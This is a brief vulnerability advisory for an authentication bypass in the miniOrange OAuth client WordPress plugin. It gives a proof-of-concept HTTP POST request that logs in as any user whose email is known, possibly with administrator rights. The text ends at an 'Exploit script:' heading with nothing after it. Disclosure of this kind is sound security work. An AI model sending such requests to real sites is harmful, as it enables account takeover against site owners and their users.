The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

Proof of Concept

POST /vdb/miniorange-oauth-client/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]

Exploit script: